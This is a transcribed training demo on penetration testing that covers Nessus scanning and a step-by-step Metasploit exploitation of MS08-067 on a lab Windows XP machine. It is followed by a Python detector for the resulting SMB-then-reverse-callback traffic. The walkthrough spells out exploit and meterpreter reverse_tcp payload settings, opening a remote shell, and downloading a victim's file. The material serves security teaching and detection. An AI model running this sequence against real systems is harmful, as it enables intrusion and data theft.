Now, we are going to start with penetration testing. So, what is penetration testing? A penetration test, or the short form pentest, is an attack on a computer system with the intention of finding security weaknesses, potentially getting access to it and to its functionality and data. So, basically there is one computer and you're finding vulnerabilities in that computer and then attacking that computer, okay. So, there are three steps in penetration testing. The first step is information gathering. For this step, there are many tools available, such as Nmap, whois and the host command. These basic network commands were covered on day one in the quiz, and we showed you a small demo of the Nmap tool, how to use this Nmap tool. So, what is the Nmap tool? The Nmap tool is used to discover live hosts in the network and then perform a port scan on those hosts, right. So, once you have this information that, okay, this host is alive in my network, what are the vulnerabilities that exist in that host? For this purpose, this is the second step, finding the vulnerabilities in the host. For this step, there are many tools available: Nessus, Nexpose. Nexpose is similar to Nessus; it finds the vulnerabilities in the target host. So, I have shown you a small demo of Nessus; I am going to repeat that again. So, using Nessus, you are going to scan a target host and then find vulnerabilities in that host. So, this is the Nessus application, the Nessus tool. Here you have to enter your username and password to log in. So, this Nessus is an open source software, an open source vulnerability scanner tool. It is used for finding vulnerabilities in web applications as well as in a system. It is also used for finding malware in Windows systems. So, the flow in Nessus is, as I said yesterday, you have to first create a policy and then use this policy to perform a scan.
So, for creating a policy, you have to go into the policy tab, click on new policy, and then it will list a number of options for creating policies. So, as you can see, there is a host discovery policy, basic network scan and web application scan. Host discovery does the same thing as Nmap does: it discovers the live hosts in your network and does a port scan on the hosts. Basic network scan, this policy is used to find the vulnerabilities on the target system. Okay, so if there is a system that is alive in the network, I will use this scan and find the vulnerabilities that exist in that system. So, in order to create a policy, you have to just select this policy, basic network scan, give the policy name, visibility (private or shared), next. Then you have to select the scan type, internal or external. So, depending on the scan type that you are selecting, a specific set of plugins is activated. So, what is a plugin? Plugins try to find the vulnerabilities in the target host or the target web application. And then select the scan type, next. And this is an optional step where you can provide the username and password of the system that you are going to scan. And then click on the save button and the policy will be created. I have created this policy already, so I am not going to do that again. So, this is the internal network scan policy that I had created already. And now, once this policy is created, I am going to use this policy and perform a scan on the target system. So now, this policy is created. And now, to launch the scan, go to the scans tab, click on new scan. And here, you have to give the name of the scan, say scan 1. Here, you have to select the policy from the list; it will display a list of policies and you have to select one of them. So, as you can see, these are all the policies that I had created. And I will select this internal network scan. Then, specify the target on which you have to perform this scan.
So, for this, you have to specify the IP address of that target system. So, it will be something like 192.168.21.34. So, this is the IP address of that target system. You can even specify a range of IP addresses. It will scan all the hosts that come in that IP address range. And then, click on launch. And as you can see, this scan is created, and the scan takes quite a long time. Since here there is no internet connection, it is completed within a few seconds. So, I had done a similar scan previously. I did this vulnerability scan on the host which had this IP address. And when the scan was complete, it showed me all these vulnerabilities. It says that there are five critical vulnerabilities, one high-level vulnerability, one medium level. So, by criticality, it means to what extent it can harm your computer if this vulnerability is exploited. So, in order to get more information about the vulnerabilities, click here and you will get a list of all the vulnerabilities that exist in the target system. Here it also gives information about the OS that is running on the target system. It is Microsoft Windows XP Service Pack 2. And here, there are several critical vulnerabilities. To get more information about a vulnerability, just click on it. Suppose, say, this one, MS08-067. When you click on this one, it says the remote host is vulnerable to a buffer overrun in the Server service that may allow an attacker to execute arbitrary code on the remote host with SYSTEM privileges. So, what it means is that there is one C program in the XP server called netapi32.dll, and in that C program there is a buffer overflow vulnerability. And this vulnerability may be exploited by the attacker. So, note this vulnerability number, that is MS08-067, and we are going to now exploit this vulnerability.
So, once we have found what all vulnerabilities exist in the target system, we will select one of them, one of the vulnerabilities, and exploit that vulnerability using Metasploit. Now, using Metasploit, we are going to exploit this vulnerability, MS08-067. So, as Nikhil has explained how we can search for vulnerabilities in the target host, you want to make a note of the vulnerability name actually. We will use that vulnerability name inside Metasploit to search which exploit should be used to exploit that vulnerability. So, I will quickly go to the demo part. Okay. So, here is a scenario. Here is a victim and an attacker. I am using VMware Workstation. So, in my computer, I am using VMware Workstation. And inside this Workstation, I am running two operating systems with different IPs. So, what happens is now there is a small network inside my computer with two systems. One is running the attacker's machine, one is running the victim's machine. So, what I am going to do is use the attacker's machine to exploit the victim's machine. Okay. So, as you can see, I am using VMware Workstation, and this is the attacker and this is the victim. So, the victim machine is Windows XP Service Pack 2, in which he has scanned and found the vulnerability MS08-067. Okay. For the attacker, I am using Kali Linux. Kali Linux comes bundled with Metasploit. You can also install Metasploit separately on Ubuntu. And also, it is already built in inside Kali Linux. So, first of all, I want to show that this is Windows XP Service Pack 2. As you can see, the system name is Microsoft Windows XP Professional Service Pack 2, version 2002. I think it is visible now. Yes. So, now I will run Metasploit inside my attacker machine. So, to run Metasploit, you just open the terminal and type msfconsole. msfconsole will open up the Metasploit framework. As you can see, I am inside the Metasploit framework.
And it has a preset of exploits in it. There are 1246 exploits inside Metasploit. Okay. So, you can use one of them to attack any target system. And when you are inside the Metasploit framework, any time you want help to see which commands are there with Metasploit, you just type help. It will show all the commands and the description of those commands. So, here I will type help and press enter. As you can see, there are many, many commands. There are some core commands like cd. cd is for changing the directory, if you want to change the directory in the local system. There is an exit command, which is used to exit from msfconsole. And many more, like info. info will give you all the information regarding a particular exploit. Okay. So, these are all the commands; you can see and explore them. Now, I will move ahead. So, if you want to see what the exploits are, those 1246 exploits inside Metasploit, you just say show exploits. It will list all the exploits inside the Metasploit framework. It is quite a long list because it has 1246 exploits. So, you can see these are all the exploits. And the first one, this is an exploit name, which is highlighted, windows/vnc, the VNC HTTP GET one. This is an exploit name. They have named each exploit, the date on which this exploit was disclosed, and its rank. So, they give a rank to a particular exploit and some description about that exploit. Okay. So, suppose now I want to search. So, as I told you, the vulnerability name was MS08-067 in Nessus. Now, I want to search for that vulnerability, search for an exploit which exploits that vulnerability. So, just say search and the vulnerability name. As you can see, search is visible, right? So, search MS08-067. Now, it will show the exploit which is used to exploit this vulnerability. So, as you can see, the name of the exploit is exploit/windows/smb/ms08_067_netapi. netapi is the C program, which Nikhil has told you about, which has the buffer overflow vulnerability.
And the same: disclosure date, rank and some description about it. Now, I want the full information about this exploit. So, there is a command called info. info will give you all the information regarding a particular exploit. So, first of all, I am using this exploit. Okay. So, to use this particular exploit, just type use and the name of the exploit. So, I will just copy the name of the exploit and paste it here. So, use; when I hit enter, I am inside that exploit. As you can see, msf exploit and, in brackets, ms08_067_netapi. I am inside the exploit module now. Now, I want to know more information about this exploit, what this exploit has. So, I will just say info and hit enter. As you can see, there is a lot of description about this. So, there is first the name of the exploit, then the module name, then the platform on which it will work, the rank, etc., who created it, and available targets. Available targets are the ones on which this exploit works. Suppose, in my victim machine, the target is Windows XP SP2 English. So, as you can see, it is listed here: Windows XP SP2 English. So, this means this exploit will work on this particular target. There are several other versions of Windows XP on which it can work. Here, you can see a small description part of this particular exploit. You can read about it and know more about the exploit, and references also if you want to know more. Okay, now I want to know. So, for this exploit, there are certain payloads. So, payloads are the actual code which will be executed inside the target machine. So, there are many payloads for this exploit. So, you want to use one of them. So, if you want to know what all those payloads are, you should say show payloads. Just don't worry about the commands. We will be providing you these commands and these videos in your resources. So, just see the steps. What are the steps? show payloads.
It will list all the payloads. So, these are all the payloads for this particular exploit. This is a description about the payload. And I will be using the particular payload which will open a command prompt of the target machine inside the attacker's machine. Okay, so that payload is windows/meterpreter/reverse_tcp. So, suppose I want to use this payload. So, just say set; for the payload we use set, for the exploit we use use. So, say set payload and the payload name. I have copied that payload name and I will just paste it here. So, I have just pasted here windows/meterpreter/reverse_tcp. As you can see, the payload is set to windows/meterpreter/reverse_tcp. Okay. Now, we will move ahead. Now, for a certain payload to execute on the target machine, this payload needs some information. Some information like the IP address of the target machine, which port it should be listening on. Okay. So, you want to know what information it requires. So, just say show options. It will list all the variables you need to specify for this payload to execute. So, here you can see you need to specify RHOST. RHOST is the IP address of the remote host, the target host on which this payload should be executed. And the port is already set. RPORT is already set, as you can see, to 445. So, we know that netapi32.dll is running on this port. So, we will not change that. Okay. So, now I want to open a command shell, a command prompt of the target machine inside the attacker's machine. So, there should be a back connection from the target machine to the attacker's machine. So, for that I need to provide my IP address also, the attacker's IP address. So, in LHOST, you will provide the IP address of the attacker. Okay. And some LPORT. LPORT could be anything, like 4444. I am using 4444. You can change it to anything. So, I will say set RHOST. RHOST is the target IP address. So, that IP address I know: 192.168.12.129.
That is the IP address of the target host. So, here we have set, as you can see, RHOST to the IP address. Now, I will set LHOST, which is the IP address of my machine. I know the IP address of my machine, which is 12.128. So, you can see that there are two different IP addresses. One is 128 and one is 129. 129 is for the target machine and 128 is for the attacker's machine. Okay. Now, if I again type show options, these variables should be set there. As you can see, RHOST is set to the 129 IP address and LHOST is set to the 128 IP address. Okay. Now, the easy part, the most easy part: just type exploit. This payload will go to the attacker's machine and execute there. exploit and hit enter. As you can see, a command prompt has appeared which is called meterpreter. So, meterpreter is like a command prompt, but it has less privileges than the command prompt. Okay. So, in meterpreter you can type a command called shell which will actually open the command prompt of the target machine. So, yeah, there are many commands for meterpreter; one of them is shell. If you want to know all the commands which it can execute, just type help again, like I showed you before. Type help and it shows all the commands here which it can use. You can learn about those. So, there are commands like cd, download, if you want to download some particular file from the remote host to our host, the attacker's host, then you can use these commands. Okay. There is an upload command, a make directory command and so on. Okay. So, I want to open the command prompt now in the attacker's machine. So, I will type shell. shell is a command from that, and hit enter. As you can see, C:\WINDOWS\system32. This is the command prompt of the Windows system, which is XP. Now, to actually see that this is happening, we will go to the victim machine and see what the files are inside his C directory.
So, I am running this command prompt there in the Windows system, the victim's machine, and see what the directories are in the C directory. I am inside C now and type dir, which will list all the directories inside C. You can see them; you can count them. So, they are AUTOEXEC, CONFIG, Documents and Settings, Program Files, secret_info.txt, text dir and WINDOWS. Okay. So, there are 1 2 3 4 5 6 7. Okay. 7 entries are there. Now, I will see these same directories inside my attacker's machine. I will just go to C and type dir again in the attacker's machine now. As you can see, all the same directories are inside my attacker's domain. Okay. Now, suppose I want to create a directory inside the victim's machine. What was the command for that? I showed you mkdir. So, just type mkdir and some folder name like hacked and hit enter. Now, if I go to the victim machine and see the dir again, you can see there is no folder here named hacked. Now, again I will type dir, hit enter. You can see a folder has been created directly: hacked. Okay. So, I have the heart of the victim's machine now. I can do anything. I can download anything. I can upload anything. I can execute anything. Okay. So, similarly I have shown another example to download, which you can later see, because this is just a command: download and the file name. So, suppose I want to download this secret_info.txt. So, I know the name now because from the dir I know there is a file called secret_info.txt. Now, in the attacker's machine I can download it. So, that download command was for meterpreter, not for the command prompt. So, if I want to go outside from the command prompt, I will type exit. I mean, now I am inside meterpreter as before. Now, I type download, which is a command for meterpreter, and the file name on the victim's machine, which is C. In C there is a file called secret_info.txt.
This is the source path, and now I will type the destination path. The destination path is my home directory on the attacker's machine. Hit enter. Now, the file has been downloaded from the victim's machine to the attacker's machine. Now, if I want to see that file, just go outside msfconsole. I am outside msfconsole. Now, I am moving to my home directory, where I have downloaded this file, and ls; as you can see, secret_info.txt is there. So, this was all about Metasploit, how you can use vulnerabilities in Metasploit to exploit a target. I am done with my demo. Thank you.
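The demo above has a network shape a defender can look for: an inbound connection to the victim's SMB port (445) from one host, followed seconds later by the victim opening an outbound TCP connection back to that same host on an unusual port (the reverse_tcp callback to LHOST:4444). The following is an added detection example, not part of the lecture or of Metasploit; it assumes a simplified, constructed flow-log format (`<ts> <src_ip>:<port> -> <dst_ip>:<port>`, lines in time order) and sample flows modelled on the demo's 192.168.12.128/.129 addresses.

```python
from collections import defaultdict

SMB_PORT = 445          # the service the demo's exploit targeted (netapi32 over SMB)
WINDOW_SECONDS = 60     # how soon after the SMB hit a callback counts as suspicious

# Constructed sample flow log (assumption: not real captured traffic).
# Format: <unix_ts> <src_ip>:<src_port> -> <dst_ip>:<dst_port>, in time order.
SAMPLE_FLOWS = """\
1000 192.168.12.128:50211 -> 192.168.12.129:445
1003 192.168.12.129:1057 -> 192.168.12.128:4444
1010 192.168.12.129:1058 -> 192.168.12.130:80
1200 192.168.12.131:50300 -> 192.168.12.129:445
1400 192.168.12.129:1059 -> 192.168.12.131:4444
"""


def parse_flow(line):
    """Split one flow line into (ts, src_ip, src_port, dst_ip, dst_port)."""
    ts, src, _, dst = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return int(ts), src_ip, int(src_port), dst_ip, int(dst_port)


def find_reverse_connections(log_text, window=WINDOW_SECONDS):
    """Return (victim, peer, smb_ts, callback_ts, callback_port) for every
    outbound connection a host makes back to a peer that connected to its
    SMB port within `window` seconds: the reverse_tcp shape from the demo."""
    smb_hits = defaultdict(list)   # (victim_ip, peer_ip) -> [timestamps]
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src_ip, _, dst_ip, dst_port = parse_flow(line)
        if dst_port == SMB_PORT:
            # Remember who touched this host's SMB service, and when.
            smb_hits[(dst_ip, src_ip)].append(ts)
            continue
        # Any other outbound flow: did its destination hit our SMB recently?
        for smb_ts in smb_hits.get((src_ip, dst_ip), []):
            if 0 <= ts - smb_ts <= window:
                alerts.append((src_ip, dst_ip, smb_ts, ts, dst_port))
                break
    return alerts


if __name__ == "__main__":
    for victim, peer, smb_ts, cb_ts, port in find_reverse_connections(SAMPLE_FLOWS):
        print(f"ALERT {victim} called back to {peer}:{port} "
              f"{cb_ts - smb_ts}s after {peer} connected to its SMB port")
```

On the sample log only the .129 -> .128:4444 callback fires; the .131 case is outside the 60-second window, and the port-80 flow has no matching SMB hit.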